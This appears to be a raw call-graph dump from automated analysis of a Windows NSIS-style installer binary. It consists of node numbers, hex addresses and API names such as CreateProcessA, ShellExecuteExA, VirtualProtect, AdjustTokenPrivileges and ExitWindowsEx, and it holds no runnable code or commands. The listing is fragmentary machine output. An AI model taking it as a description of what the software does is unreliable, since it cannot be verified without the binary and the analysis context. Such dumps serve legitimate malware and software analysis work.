5198->5187 5198->5188 5198->5192 5198->5197 5206 4042f7 22 API calls 5198->5206 5222 4041c2 DestroyWindow 5198->5222 5203 40140b 2 API calls 5199->5203 5202 40140b 2 API calls 5200->5202 5201->5174 5204 403f3d 5202->5204 5203->5205 5204->5174 5204->5205 5205->5196 5207 4040ae GetDlgItem 5206->5207 5208 4040c3 5207->5208 5209 4040cb ShowWindow KiUserCallbackDispatcher 5207->5209 5208->5209 5231 404319 KiUserCallbackDispatcher 5209->5231 5211 4040f5 EnableWindow 5216 404109 5211->5216 5212 40410e GetSystemMenu EnableMenuItem SendMessageA 5213 40413e SendMessageA 5212->5213 5212->5216 5213->5216 5215 403dde 22 API calls 5215->5216 5216->5212 5216->5215 5232 40432c SendMessageA 5216->5232 5233 406257 lstrcpynA 5216->5233 5218 40416d lstrlenA 5219 4062ea 21 API calls 5218->5219 5220 40417e SetWindowTextA 5219->5220 5221 401389 2 API calls 5220->5221 5221->5198 5222->5182 5223 4041dc CreateDialogParamA 5222->5223 5223->5182 5224 40420f 5223->5224 5225 4042f7 22 API calls 5224->5225 5226 40421a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5225->5226 5227 401389 2 API calls 5226->5227 5228 404260 5227->5228 5228->5173 5229 404268 ShowWindow 5228->5229 5230 404343 SendMessageA 5229->5230 5230->5182 5231->5211 5232->5216 5233->5218 5612 707516c8 5613 707516f7 5612->5613 5614 70751b28 18 API calls 5613->5614 5615 707516fe 5614->5615 5616 70751705 5615->5616 5617 70751711 5615->5617 5618 707512f6 2 API calls 5616->5618 5619 70751738 5617->5619 5620 7075171b 5617->5620 5621 7075170f 5618->5621 5623 70751762 5619->5623 5624 7075173e 5619->5624 5622 70751572 3 API calls 5620->5622 5626 70751720 5622->5626 5625 70751572 3 API calls 5623->5625 5627 707515e9 3 API calls 5624->5627 5625->5621 5628 707515e9 3 API calls 5626->5628 5629 70751743 5627->5629 5631 70751726 5628->5631 5630 707512f6 2 API calls 5629->5630 5632 70751749 GlobalFree 5630->5632 5633 707512f6 2 API calls 5631->5633 5632->5621 5634 7075175d GlobalFree 5632->5634 5635 7075172c GlobalFree 5633->5635 
5634->5621 5635->5621 5234 40177e 5235 402c5e 21 API calls 5234->5235 5236 401785 5235->5236 5237 4017a3 5236->5237 5238 4017ab 5236->5238 5273 406257 lstrcpynA 5237->5273 5274 406257 lstrcpynA 5238->5274 5241 4017a9 5245 406551 5 API calls 5241->5245 5242 4017b6 5243 405be9 3 API calls 5242->5243 5244 4017bc lstrcatA 5243->5244 5244->5241 5260 4017c8 5245->5260 5246 4065ea 2 API calls 5246->5260 5247 405dc5 2 API calls 5247->5260 5249 4017df CompareFileTime 5249->5260 5250 4018a3 5251 40539b 28 API calls 5250->5251 5254 4018ad 5251->5254 5252 40539b 28 API calls 5262 40188f 5252->5262 5253 406257 lstrcpynA 5253->5260 5255 403168 39 API calls 5254->5255 5256 4018c0 5255->5256 5257 4018d4 SetFileTime 5256->5257 5258 4018e6 CloseHandle 5256->5258 5257->5258 5261 4018f7 5258->5261 5258->5262 5259 4062ea 21 API calls 5259->5260 5260->5246 5260->5247 5260->5249 5260->5250 5260->5253 5260->5259 5267 40596d MessageBoxIndirectA 5260->5267 5270 40187a 5260->5270 5272 405dea GetFileAttributesA CreateFileA 5260->5272 5263 4018fc 5261->5263 5264 40190f 5261->5264 5265 4062ea 21 API calls 5263->5265 5266 4062ea 21 API calls 5264->5266 5268 401904 lstrcatA 5265->5268 5269 401917 5266->5269 5267->5260 5268->5269 5269->5262 5271 40596d MessageBoxIndirectA 5269->5271 5270->5252 5270->5262 5271->5262 5272->5260 5273->5241 5274->5242 5636 40167e 5637 402c5e 21 API calls 5636->5637 5638 401684 5637->5638 5639 4065ea 2 API calls 5638->5639 5640 40168a 5639->5640 5641 40197e 5642 402c3c 21 API calls 5641->5642 5643 401985 5642->5643 5644 402c3c 21 API calls 5643->5644 5645 401992 5644->5645 5646 402c5e 21 API calls 5645->5646 5647 4019a9 lstrlenA 5646->5647 5649 4019b9 5647->5649 5648 4019f9 5649->5648 5653 406257 lstrcpynA 5649->5653 5651 4019e9 5651->5648 5652 4019ee lstrlenA 5651->5652 5652->5648 5653->5651 5654 401000 5655 401037 BeginPaint GetClientRect 5654->5655 5656 40100c DefWindowProcA 5654->5656 5658 4010f3 5655->5658 5659 401179 5656->5659 5660 401073 CreateBrushIndirect 
FillRect DeleteObject 5658->5660 5661 4010fc 5658->5661 5660->5658 5662 401102 CreateFontIndirectA 5661->5662 5663 401167 EndPaint 5661->5663 5662->5663 5664 401112 6 API calls 5662->5664 5663->5659 5664->5663 5665 401502 5666 401507 5665->5666 5667 40152d 5665->5667 5668 402c3c 21 API calls 5666->5668 5668->5667 5669 401a83 5670 402c3c 21 API calls 5669->5670 5671 401a8c 5670->5671 5672 402c3c 21 API calls 5671->5672 5673 401a33 5672->5673 4779 707529b1 4780 70752a01 4779->4780 4781 707529c1 VirtualProtect 4779->4781 4781->4780 5674 7075103d 5677 7075101b 5674->5677 5678 7075154b GlobalFree 5677->5678 5679 70751020 5678->5679 5680 70751024 5679->5680 5681 70751027 GlobalAlloc 5679->5681 5682 70751572 3 API calls 5680->5682 5681->5680 5683 7075103b 5682->5683 5684 401588 5685 402a67 5684->5685 5688 4061b5 wsprintfA 5685->5688 5687 402a6c 5688->5687 5689 401b88 5690 402c5e 21 API calls 5689->5690 5691 401b8f 5690->5691 5692 402c3c 21 API calls 5691->5692 5693 401b98 wsprintfA 5692->5693 5694 402aea 5693->5694 5695 404789 5696 4047b5 5695->5696 5697 4047c6 5695->5697 5756 405951 GetDlgItemTextA 5696->5756 5699 4047d2 GetDlgItem 5697->5699 5705 404831 5697->5705 5701 4047e6 5699->5701 5700 4047c0 5703 406551 5 API calls 5700->5703 5704 4047fa SetWindowTextA 5701->5704 5708 405c82 4 API calls 5701->5708 5702 404915 5752 404abf 5702->5752 5758 405951 GetDlgItemTextA 5702->5758 5703->5697 5709 4042f7 22 API calls 5704->5709 5705->5702 5710 4062ea 21 API calls 5705->5710 5705->5752 5707 40435e 8 API calls 5712 404ad3 5707->5712 5713 4047f0 5708->5713 5714 404816 5709->5714 5715 4048a5 SHBrowseForFolderA 5710->5715 5711 404945 5716 405cd7 18 API calls 5711->5716 5713->5704 5722 405be9 3 API calls 5713->5722 5717 4042f7 22 API calls 5714->5717 5715->5702 5718 4048bd CoTaskMemFree 5715->5718 5719 40494b 5716->5719 5720 404824 5717->5720 5721 405be9 3 API calls 5718->5721 5759 406257 lstrcpynA 5719->5759 5757 40432c SendMessageA 5720->5757 5724 4048ca 5721->5724 5722->5704 
5727 404901 SetDlgItemTextA 5724->5727 5731 4062ea 21 API calls 5724->5731 5726 40482a 5729 40667f 5 API calls 5726->5729 5727->5702 5728 404962 5730 40667f 5 API calls 5728->5730 5729->5705 5738 404969 5730->5738 5732 4048e9 lstrcmpiA 5731->5732 5732->5727 5735 4048fa lstrcatA 5732->5735 5733 4049a5 5760 406257 lstrcpynA 5733->5760 5735->5727 5736 4049ac 5737 405c82 4 API calls 5736->5737 5739 4049b2 GetDiskFreeSpaceA 5737->5739 5738->5733 5742 405c30 2 API calls 5738->5742 5743 4049fd 5738->5743 5741 4049d6 MulDiv 5739->5741 5739->5743 5741->5743 5742->5738 5744 404c05 24 API calls 5743->5744 5753 404a6e 5743->5753 5746 404a5b 5744->5746 5745 404a91 5761 404319 KiUserCallbackDispatcher 5745->5761 5748 404a70 SetDlgItemTextA 5746->5748 5749 404a60 5746->5749 5747 40140b 2 API calls 5747->5745 5748->5753 5751 404b40 24 API calls 5749->5751 5751->5753 5752->5707 5753->5745 5753->5747 5754 404aad 5754->5752 5755 4046e2 SendMessageA 5754->5755 5755->5752 5756->5700 5757->5726 5758->5711 5759->5728 5760->5736 5761->5754 5762 401d8a 5763 401d90 5762->5763 5764 401d9d GetDlgItem 5762->5764 5765 402c3c 21 API calls 5763->5765 5766 401d97 5764->5766 5765->5766 5767 401dde GetClientRect LoadImageA SendMessageA 5766->5767 5769 402c5e 21 API calls 5766->5769 5770 401e3f 5767->5770 5772 401e4b 5767->5772 5769->5767 5771 401e44 DeleteObject 5770->5771 5770->5772 5771->5772 5773 40278b 5774 402791 5773->5774 5775 402799 FindClose 5774->5775 5776 402aea 5774->5776 5775->5776 5008 40240d 5009 402c5e 21 API calls 5008->5009 5010 40241e 5009->5010 5011 402c5e 21 API calls 5010->5011 5012 402427 5011->5012 5013 402c5e 21 API calls 5012->5013 5014 402431 GetPrivateProfileStringA 5013->5014 5777 40280d 5778 402c5e 21 API calls 5777->5778 5779 402819 5778->5779 5780 40282f 5779->5780 5782 402c5e 21 API calls 5779->5782 5781 405dc5 2 API calls 5780->5781 5783 402835 5781->5783 5782->5780 5805 405dea GetFileAttributesA CreateFileA 5783->5805 5785 402842 5786 4028fe 5785->5786 5787 4028e6 
5785->5787 5788 40285d GlobalAlloc 5785->5788 5789 402905 DeleteFileA 5786->5789 5790 402918 5786->5790 5792 403168 39 API calls 5787->5792 5788->5787 5791 402876 5788->5791 5789->5790 5806 40335a SetFilePointer 5791->5806 5794 4028f3 CloseHandle 5792->5794 5794->5786 5795 40287c 5796 403344 ReadFile 5795->5796 5797 402885 GlobalAlloc 5796->5797 5798 402895 5797->5798 5799 4028cf 5797->5799 5801 403168 39 API calls 5798->5801 5800 405e91 WriteFile 5799->5800 5802 4028db GlobalFree 5800->5802 5804 4028a2 5801->5804 5802->5787 5803 4028c6 GlobalFree 5803->5799 5804->5803 5805->5785 5806->5795 5807 40530f 5808 405333 5807->5808 5809 40531f 5807->5809 5812 40533b IsWindowVisible 5808->5812 5818 405352 5808->5818 5810 405325 5809->5810 5811 40537c 5809->5811 5814 404343 SendMessageA 5810->5814 5813 405381 CallWindowProcA 5811->5813 5812->5811 5815 405348 5812->5815 5816 40532f 5813->5816 5814->5816 5817 404c4a 5 API calls 5815->5817 5817->5818 5818->5813 5819 404cca 4 API calls 5818->5819 5819->5811 5820 40168f 5821 402c5e 21 API calls 5820->5821 5822 401696 5821->5822 5823 402c5e 21 API calls 5822->5823 5824 40169f 5823->5824 5825 402c5e 21 API calls 5824->5825 5826 4016a8 MoveFileA 5825->5826 5827 4016bb 5826->5827 5833 4016b4 5826->5833 5828 4065ea 2 API calls 5827->5828 5831 40230f 5827->5831 5830 4016ca 5828->5830 5829 401423 28 API calls 5829->5831 5830->5831 5832 406030 40 API calls 5830->5832 5832->5833 5833->5829 5834 401490 5835 40539b 28 API calls 5834->5835 5836 401497 5835->5836 5837 401a12 5838 402c5e 21 API calls 5837->5838 5839 401a19 5838->5839 5840 402c5e 21 API calls 5839->5840 5841 401a22 5840->5841 5842 401a29 lstrcmpiA 5841->5842 5843 401a3b lstrcmpA 5841->5843 5844 401a2f 5842->5844 5843->5844 5046 401594 5047 4015a4 ShowWindow 5046->5047 5048 4015ab 5046->5048 5047->5048 5049 4015b9 ShowWindow 5048->5049 5050 402aea 5048->5050 5049->5050 5073 402318 5074 402c5e 21 API calls 5073->5074 5075 40231e 5074->5075 5076 402c5e 21 API calls 5075->5076 
5077 402327 5076->5077 5078 402c5e 21 API calls 5077->5078 5079 402330 5078->5079 5080 4065ea 2 API calls 5079->5080 5081 402339 5080->5081 5082 40234a lstrlenA lstrlenA 5081->5082 5086 40233d 5081->5086 5083 40539b 28 API calls 5082->5083 5085 402386 SHFileOperationA 5083->5085 5084 40539b 28 API calls 5087 402345 5084->5087 5085->5086 5085->5087 5086->5084 5086->5087 5852 402198 5853 402c5e 21 API calls 5852->5853 5854 40219f 5853->5854 5855 402c5e 21 API calls 5854->5855 5856 4021a9 5855->5856 5857 402c5e 21 API calls 5856->5857 5858 4021b3 5857->5858 5859 402c5e 21 API calls 5858->5859 5860 4021c0 5859->5860 5861 402c5e 21 API calls 5860->5861 5862 4021ca 5861->5862 5863 40220c CoCreateInstance 5862->5863 5864 402c5e 21 API calls 5862->5864 5867 40222b 5863->5867 5869 4022d9 5863->5869 5864->5863 5865 401423 28 API calls 5866 40230f 5865->5866 5868 4022b9 MultiByteToWideChar 5867->5868 5867->5869 5868->5869 5869->5865 5869->5866 5870 40269a 5871 402c3c 21 API calls 5870->5871 5876 4026a4 5871->5876 5872 402712 5873 405e62 ReadFile 5873->5876 5874 402714 5879 4061b5 wsprintfA 5874->5879 5875 402724 5875->5872 5878 40273a SetFilePointer 5875->5878 5876->5872 5876->5873 5876->5874 5876->5875 5878->5872 5879->5872 5880 40239a 5881 4023a1 5880->5881 5884 4023b4 5880->5884 5882 4062ea 21 API calls 5881->5882 5883 4023ae 5882->5883 5883->5884 5885 40596d MessageBoxIndirectA 5883->5885 5885->5884 5886 402a1b 5887 402a22 5886->5887 5888 402a6e 5886->5888 5891 402c3c 21 API calls 5887->5891 5894 402a6c 5887->5894 5889 40667f 5 API calls 5888->5889 5890 402a75 5889->5890 5892 402c5e 21 API calls 5890->5892 5893 402a30 5891->5893 5895 402a7e 5892->5895 5896 402c3c 21 API calls 5893->5896 5895->5894 5904 4062aa 5895->5904 5898 402a3f 5896->5898 5903 4061b5 wsprintfA 5898->5903 5899 402a8c 5899->5894 5908 406294 5899->5908 5903->5894 5905 4062b5 5904->5905 5906 4062d8 IIDFromString 5905->5906 5907 4062d1 5905->5907 5906->5899 5907->5899 5911 406279 WideCharToMultiByte 
5908->5911 5910 402aad CoTaskMemFree 5910->5894 5911->5910 5912 40149d 5913 4023b4 5912->5913 5914 4014ab PostQuitMessage 5912->5914 5914->5913 5915 403a1e 5916 403a29 5915->5916 5917 403a30 GlobalAlloc 5916->5917 5918 403a2d 5916->5918 5917->5918 5919 401f1e 5920 402c5e 21 API calls 5919->5920 5921 401f24 5920->5921 5922 402c5e 21 API calls 5921->5922 5923 401f2d 5922->5923 5924 402c5e 21 API calls 5923->5924 5925 401f36 5924->5925 5926 402c5e 21 API calls 5925->5926 5927 401f3f 5926->5927 5928 401423 28 API calls 5927->5928 5929 401f46 5928->5929 5936 405933 ShellExecuteExA 5929->5936 5931 401f81 5932 4066f4 5 API calls 5931->5932 5934 4027ed 5931->5934 5933 401f9b CloseHandle 5932->5933 5933->5934 5936->5931 5937 40291e 5938 402c3c 21 API calls 5937->5938 5939 402924 5938->5939 5940 402966 5939->5940 5941 40294c 5939->5941 5947 4027ed 5939->5947 5943 402980 5940->5943 5944 402970 5940->5944 5942 402951 5941->5942 5950 402960 5941->5950 5951 406257 lstrcpynA 5942->5951 5946 4062ea 21 API calls 5943->5946 5945 402c3c 21 API calls 5944->5945 5945->5950 5946->5950 5950->5947 5952 4061b5 wsprintfA 5950->5952 5951->5947 5952->5947 4293 401fa0 4294 402c5e 21 API calls 4293->4294 4295 401fa6 4294->4295 4296 40539b 28 API calls 4295->4296 4297 401fb0 4296->4297 4308 4058f0 CreateProcessA 4297->4308 4300 401fd7 CloseHandle 4304 4027ed 4300->4304 4303 401fcb 4305 401fd0 4303->4305 4306 401fd9 4303->4306 4316 4061b5 wsprintfA 4305->4316 4306->4300 4309 405923 CloseHandle 4308->4309 4310 401fb6 4308->4310 4309->4310 4310->4300 4310->4304 4311 4066f4 WaitForSingleObject 4310->4311 4312 40670e 4311->4312 4313 406720 GetExitCodeProcess 4312->4313 4317 4066bb 4312->4317 4313->4303 4316->4300 4318 4066d8 PeekMessageA 4317->4318 4319 4066e8 WaitForSingleObject 4318->4319 4320 4066ce DispatchMessageA 4318->4320 4319->4312 4320->4318 5953 402020 5954 402c5e 21 API calls 5953->5954 5955 402027 5954->5955 5956 40667f 5 API calls 5955->5956 5957 402036 5956->5957 5958 4020be 5957->5958 
5959 40204e GlobalAlloc 5957->5959 5959->5958 5960 402062 5959->5960 5961 40667f 5 API calls 5960->5961 5962 402069 5961->5962 5963 40667f 5 API calls 5962->5963 5964 402073 5963->5964 5964->5958 5968 4061b5 wsprintfA 5964->5968 5966 4020ae 5969 4061b5 wsprintfA 5966->5969 5968->5966 5969->5958 4325 4033a2 SetErrorMode GetVersionExA 4326 4033f4 GetVersionExA 4325->4326 4328 403433 4325->4328 4327 403410 4326->4327 4326->4328 4327->4328 4329 4034b7 4328->4329 4330 40667f 5 API calls 4328->4330 4331 406611 3 API calls 4329->4331 4330->4329 4332 4034cd lstrlenA 4331->4332 4332->4329 4333 4034dd 4332->4333 4334 40667f 5 API calls 4333->4334 4335 4034e4 4334->4335 4336 40667f 5 API calls 4335->4336 4337 4034eb 4336->4337 4338 40667f 5 API calls 4337->4338 4339 4034f7 #17 OleInitialize SHGetFileInfoA 4338->4339 4414 406257 lstrcpynA 4339->4414 4342 403545 GetCommandLineA 4415 406257 lstrcpynA 4342->4415 4344 403557 4345 405c14 CharNextA 4344->4345 4346 40357e CharNextA 4345->4346 4354 40358d 4346->4354 4347 403653 4348 403667 GetTempPathA 4347->4348 4416 403371 4348->4416 4350 40367f 4351 403683 GetWindowsDirectoryA lstrcatA 4350->4351 4352 4036d9 DeleteFileA 4350->4352 4355 403371 12 API calls 4351->4355 4426 402f31 GetTickCount GetModuleFileNameA 4352->4426 4353 405c14 CharNextA 4353->4354 4354->4347 4354->4353 4358 403655 4354->4358 4357 40369f 4355->4357 4357->4352 4361 4036a3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4357->4361 4510 406257 lstrcpynA 4358->4510 4359 4036ec 4367 405c14 CharNextA 4359->4367 4396 403771 4359->4396 4406 403781 4359->4406 4363 403371 12 API calls 4361->4363 4365 4036d1 4363->4365 4365->4352 4365->4406 4368 403706 4367->4368 4376 4037b0 4368->4376 4377 40374b 4368->4377 4369 4038f2 4371 403970 ExitProcess 4369->4371 4372 4038fa GetCurrentProcess OpenProcessToken 4369->4372 4370 40379b 4534 40596d 4370->4534 4374 403940 4372->4374 4375 403911 LookupPrivilegeValueA AdjustTokenPrivileges 4372->4375 4380 40667f 5 
API calls 4374->4380 4375->4374 4382 4058d8 5 API calls 4376->4382 4511 405cd7 4377->4511 4390 403947 4380->4390 4384 4037b5 lstrlenA 4382->4384 4538 406257 lstrcpynA 4384->4538 4385 40395c ExitWindowsEx 4385->4371 4387 403969 4385->4387 4588 40140b 4387->4588 4389 4037cd 4393 4037e5 4389->4393 4539 406257 lstrcpynA 4389->4539 4390->4385 4390->4387 4392 403766 4526 406257 lstrcpynA 4392->4526 4397 403803 wsprintfA 4393->4397 4411 403831 4393->4411 4454 403a60 4396->4454 4398 4062ea 21 API calls 4397->4398 4398->4393 4399 405861 2 API calls 4399->4411 4400 4058bb 2 API calls 4400->4411 4401 403841 GetFileAttributesA 4404 40384d DeleteFileA 4401->4404 4401->4411 4402 403879 SetCurrentDirectoryA 4581 406030 MoveFileExA 4402->4581 4404->4411 4527 403986 4406->4527 4408 406030 40 API calls 4408->4411 4409 4062ea 21 API calls 4409->4411 4410 4058f0 2 API calls 4410->4411 4411->4393 4411->4397 4411->4399 4411->4400 4411->4401 4411->4402 4411->4406 4411->4408 4411->4409 4411->4410 4412 4038e2 CloseHandle 4411->4412 4540 405a19 4411->4540 4585 4065ea FindFirstFileA 4411->4585 4412->4406 4414->4342 4415->4344 4417 406551 5 API calls 4416->4417 4419 40337d 4417->4419 4418 403387 4418->4350 4419->4418 4591 405be9 lstrlenA CharPrevA 4419->4591 4422 4058bb 2 API calls 4423 403395 4422->4423 4594 405e19 4423->4594 4598 405dea GetFileAttributesA CreateFileA 4426->4598 4428 402f71 4447 402f81 4428->4447 4599 406257 lstrcpynA 4428->4599 4430 402f97 4600 405c30 lstrlenA 4430->4600 4434 402fa8 GetFileSize 4435 4030a2 4434->4435 4453 402fbf 4434->4453 4605 402ecd 4435->4605 4437 4030ab 4439 4030db GlobalAlloc 4437->4439 4437->4447 4641 40335a SetFilePointer 4437->4641 4616 40335a SetFilePointer 4439->4616 4442 40310e 4444 402ecd 6 API calls 4442->4444 4443 4030f6 4617 403168 4443->4617 4444->4447 4445 4030c4 4448 403344 ReadFile 4445->4448 4447->4359 4450 4030cf 4448->4450 4449 402ecd 6 API calls 4449->4453 4450->4439 4450->4447 4451 403102 4451->4447 4451->4451 4452 40313f 
SetFilePointer 4451->4452 4452->4447 4453->4435 4453->4442 4453->4447 4453->4449 4638 403344 4453->4638 4455 40667f 5 API calls 4454->4455 4456 403a74 4455->4456 4457 403a7a 4456->4457 4458 403a8c 4456->4458 4669 4061b5 wsprintfA 4457->4669 4459 40613e 3 API calls 4458->4459 4460 403ab7 4459->4460 4461 403ad5 lstrcatA 4460->4461 4463 40613e 3 API calls 4460->4463 4464 403a8a 4461->4464 4463->4461 4654 403d25 4464->4654 4467 405cd7 18 API calls 4468 403b07 4467->4468 4469 403b90 4468->4469 4471 40613e 3 API calls 4468->4471 4470 405cd7 18 API calls 4469->4470 4472 403b96 4470->4472 4474 403b33 4471->4474 4473 403ba6 LoadImageA 4472->4473 4475 4062ea 21 API calls 4472->4475 4476 403c4c 4473->4476 4477 403bcd RegisterClassA 4473->4477 4474->4469 4478 403b4f lstrlenA 4474->4478 4481 405c14 CharNextA 4474->4481 4475->4473 4480 40140b 2 API calls 4476->4480 4479 403c03 SystemParametersInfoA CreateWindowExA 4477->4479 4509 403c56 4477->4509 4482 403b83 4478->4482 4483 403b5d lstrcmpiA 4478->4483 4479->4476 4484 403c52 4480->4484 4485 403b4d 4481->4485 4487 405be9 3 API calls 4482->4487 4483->4482 4486 403b6d GetFileAttributesA 4483->4486 4489 403d25 22 API calls 4484->4489 4484->4509 4485->4478 4488 403b79 4486->4488 4490 403b89 4487->4490 4488->4482 4491 405c30 2 API calls 4488->4491 4492 403c63 4489->4492 4670 406257 lstrcpynA 4490->4670 4491->4482 4494 403cf2 4492->4494 4495 403c6f ShowWindow 4492->4495 4662 40546d OleInitialize 4494->4662 4497 406611 3 API calls 4495->4497 4499 403c87 4497->4499 4498 403cf8 4500 403d14 4498->4500 4501 403cfc 4498->4501 4502 403c95 GetClassInfoA 4499->4502 4504 406611 3 API calls 4499->4504 4503 40140b 2 API calls 4500->4503 4508 40140b 2 API calls 4501->4508 4501->4509 4505 403ca9 GetClassInfoA RegisterClassA 4502->4505 4506 403cbf DialogBoxParamA 4502->4506 4503->4509 4504->4502 4505->4506 4507 40140b 2 API calls 4506->4507 4507->4509 4508->4509 4509->4406 4510->4348 4682 406257 lstrcpynA 4511->4682 4513 405ce8 4514 405c82 4 API 
calls 4513->4514 4515 405cee 4514->4515 4516 403757 4515->4516 4517 406551 5 API calls 4515->4517 4516->4406 4525 406257 lstrcpynA 4516->4525 4523 405cfe 4517->4523 4518 405d29 lstrlenA 4519 405d34 4518->4519 4518->4523 4520 405be9 3 API calls 4519->4520 4522 405d39 GetFileAttributesA 4520->4522 4521 4065ea 2 API calls 4521->4523 4522->4516 4523->4516 4523->4518 4523->4521 4524 405c30 2 API calls 4523->4524 4524->4518 4525->4392 4526->4396 4528 403990 CloseHandle 4527->4528 4529 40399e 4527->4529 4528->4529 4683 4039cb 4529->4683 4532 405a19 71 API calls 4533 403789 OleUninitialize 4532->4533 4533->4369 4533->4370 4536 405982 4534->4536 4535 4037a8 ExitProcess 4536->4535 4537 405996 MessageBoxIndirectA 4536->4537 4537->4535 4538->4389 4539->4393 4541 405cd7 18 API calls 4540->4541 4542 405a39 4541->4542 4543 405a41 DeleteFileA 4542->4543 4544 405a58 4542->4544 4545 405b9c 4543->4545 4547 405b90 4544->4547 4687 406257 lstrcpynA 4544->4687 4545->4411 4547->4545 4553 4065ea 2 API calls 4547->4553 4548 405a7e 4549 405a91 4548->4549 4550 405a84 lstrcatA 4548->4550 4552 405c30 2 API calls 4549->4552 4551 405a97 4550->4551 4554 405aa5 lstrcatA 4551->4554 4555 405a9c 4551->4555 4552->4551 4556 405baa 4553->4556 4558 405ab0 lstrlenA FindFirstFileA 4554->4558 4555->4554 4555->4558 4556->4545 4557 405bae 4556->4557 4559 405be9 3 API calls 4557->4559 4560 405b86 4558->4560 4579 405ad4 4558->4579 4561 405bb4 4559->4561 4560->4547 4563 4059d1 5 API calls 4561->4563 4562 405c14 CharNextA 4562->4579 4564 405bc0 4563->4564 4565 405bc4 4564->4565 4566 405bda 4564->4566 4565->4545 4571 40539b 28 API calls 4565->4571 4569 40539b 28 API calls 4566->4569 4567 405b65 FindNextFileA 4570 405b7d FindClose 4567->4570 4567->4579 4569->4545 4570->4560 4572 405bd1 4571->4572 4573 406030 40 API calls 4572->4573 4576 405bd8 4573->4576 4575 405a19 64 API calls 4575->4579 4576->4545 4577 40539b 28 API calls 4577->4567 4578 40539b 28 API calls 4578->4579 4579->4562 4579->4567 4579->4575 4579->4577 
4579->4578 4580 406030 40 API calls 4579->4580 4688 406257 lstrcpynA 4579->4688 4689 4059d1 4579->4689 4580->4579 4582 403888 CopyFileA 4581->4582 4583 406044 4581->4583 4582->4406 4582->4411 4700 405ec0 4583->4700 4586 406600 FindClose 4585->4586 4587 40660b 4585->4587 4586->4587 4587->4411 4589 401389 2 API calls 4588->4589 4590 401420 4589->4590 4590->4371 4592 405c03 lstrcatA 4591->4592 4593 40338f 4591->4593 4592->4593 4593->4422 4595 405e24 GetTickCount GetTempFileNameA 4594->4595 4596 405e51 4595->4596 4597 4033a0 4595->4597 4596->4595 4596->4597 4597->4350 4598->4428 4599->4430 4601 405c3d 4600->4601 4602 405c42 CharPrevA 4601->4602 4603 402f9d 4601->4603 4602->4601 4602->4603 4604 406257 lstrcpynA 4603->4604 4604->4434 4606 402ed6 4605->4606 4607 402eee 4605->4607 4610 402ee6 4606->4610 4611 402edf DestroyWindow 4606->4611 4608 402ef6 4607->4608 4609 402efe GetTickCount 4607->4609 4612 4066bb 2 API calls 4608->4612 4613 402f0c CreateDialogParamA ShowWindow 4609->4613 4614 402f2f 4609->4614 4610->4437 4611->4610 4615 402efc 4612->4615 4613->4614 4614->4437 4615->4437 4616->4443 4618 40317e 4617->4618 4619 4031a9 4618->4619 4651 40335a SetFilePointer 4618->4651 4621 403344 ReadFile 4619->4621 4622 4031b4 4621->4622 4623 4032e4 4622->4623 4624 4031c6 GetTickCount 4622->4624 4627 4032ce 4622->4627 4625 4032e8 4623->4625 4630 403300 4623->4630 4634 4031d9 4624->4634 4626 403344 ReadFile 4625->4626 4626->4627 4627->4451 4628 403344 ReadFile 4628->4630 4629 403344 ReadFile 4629->4634 4630->4627 4630->4628 4631 405e91 WriteFile 4630->4631 4631->4630 4633 40323f GetTickCount 4633->4634 4634->4627 4634->4629 4634->4633 4635 403268 MulDiv wsprintfA 4634->4635 4642 4067c4 4634->4642 4649 405e91 WriteFile 4634->4649 4636 40539b 28 API calls 4635->4636 4636->4634 4652 405e62 ReadFile 4638->4652 4641->4445 4643 4067e9 4642->4643 4644 4067f1 4642->4644 4643->4634 4644->4643 4645 406881 GlobalAlloc 4644->4645 4646 406878 GlobalFree 4644->4646 4647 4068f8 GlobalAlloc 
4644->4647 4648 4068ef GlobalFree 4644->4648 4645->4643 4645->4644 4646->4645 4647->4643 4647->4644 4648->4647 4650 405eaf 4649->4650 4650->4634 4651->4619 4653 403357 4652->4653 4653->4453 4655 403d39 4654->4655 4671 4061b5 wsprintfA 4655->4671 4657 403daa 4672 403dde 4657->4672 4659 403ae5 4659->4467 4660 403daf 4660->4659 4661 4062ea 21 API calls 4660->4661 4661->4660 4675 404343 4662->4675 4664 405490 4668 4054b7 4664->4668 4678 401389 4664->4678 4665 404343 SendMessageA 4666 4054c9 OleUninitialize 4665->4666 4666->4498 4668->4665 4669->4464 4670->4469 4671->4657 4673 4062ea 21 API calls 4672->4673 4674 403dec SetWindowTextA 4673->4674 4674->4660 4676 40435b 4675->4676 4677 40434c SendMessageA 4675->4677 4676->4664 4677->4676 4680 401390 4678->4680 4679 4013fe 4679->4664 4680->4679 4681 4013cb MulDiv SendMessageA 4680->4681 4681->4680 4682->4513 4684 4039d9 4683->4684 4685 4039a3 4684->4685 4686 4039de FreeLibrary GlobalFree 4684->4686 4685->4532 4686->4685 4686->4686 4687->4548 4688->4579 4697 405dc5 GetFileAttributesA 4689->4697 4692 4059fe 4692->4579 4693 4059f4 DeleteFileA 4695 4059fa 4693->4695 4694 4059ec RemoveDirectoryA 4694->4695 4695->4692 4696 405a0a SetFileAttributesA 4695->4696 4696->4692 4698 4059dd 4697->4698 4699 405dd7 SetFileAttributesA 4697->4699 4698->4692 4698->4693 4698->4694 4699->4698 4701 405ee6 4700->4701 4702 405f0c GetShortPathNameA 4700->4702 4727 405dea GetFileAttributesA CreateFileA 4701->4727 4704 405f21 4702->4704 4705 40602b 4702->4705 4704->4705 4707 405f29 wsprintfA 4704->4707 4705->4582 4706 405ef0 CloseHandle GetShortPathNameA 4706->4705 4708 405f04 4706->4708 4709 4062ea 21 API calls 4707->4709 4708->4702 4708->4705 4710 405f51 4709->4710 4728 405dea GetFileAttributesA CreateFileA 4710->4728 4712 405f5e 4712->4705 4713 405f6d GetFileSize GlobalAlloc 4712->4713 4714 406024 CloseHandle 4713->4714 4715 405f8f 4713->4715 4714->4705 4716 405e62 ReadFile 4715->4716 4717 405f97 4716->4717 4717->4714 4729 405d4f lstrlenA 
